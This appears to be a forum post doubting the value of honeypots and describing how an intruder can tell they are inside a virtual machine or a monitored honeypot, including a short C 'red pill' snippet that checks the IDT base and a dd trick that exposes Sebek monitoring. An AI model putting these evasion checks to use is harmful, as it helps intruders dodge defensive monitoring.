When working on honeypots, don't expect to uncover anything that was actually very secret or dont expect to find a 0day. Honeynet project wasnt even capable of getting a few ok results after so many years.
The reason: people are not stupid. if you catch someone in vmware or virtualpc or etc. , if he is stupid enough not to understand that he is inside the matrix, then the value of the information you get from him will be as worthless. So instead of satisfying yourself with 'hey look at the kiddie, he things he is hacking, but I am smarter" approach, you can decide to do something more useful. As mentioned before, you will only be able to catch some neighbour kids.
It is very simple to determine that the host is actually a virtual pc. You can look at the description of the devices. If you see some e.g vmware devices, means you are in.
or you can run Joanna's red pill:
int main () {
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
printf ("idt base: %#x\n", *((unsigned*)&m[2]));
if (m[5]>0xd0) printf ("Inside Matrix!\n", m[5]);
else printf ("Not in Matrix.\n");
return 0;
}
Note that this can give false positives after kernel 2.4.18
The problem lies beneath how you will sniff him. Will he be stupid enough to use nc after he gets inside the box, so that you can easily sniff? How about the ssh connection?
Let's say you put a keylogger for systemcalls, so you get ssh keylogs. Probably you'll be using sebek.
just by doing a dd if=/dev/zero of=/dev/null which doesn't do anything normally, you'll notice that cpu gets around %100 and network traffic increases like hell. That means you are monitored. There are a lot of easier ways to detect,so if one becomes obsolete, you try the other one.
Just keep in mind...
Sign In
Register
Help
MultiQuote
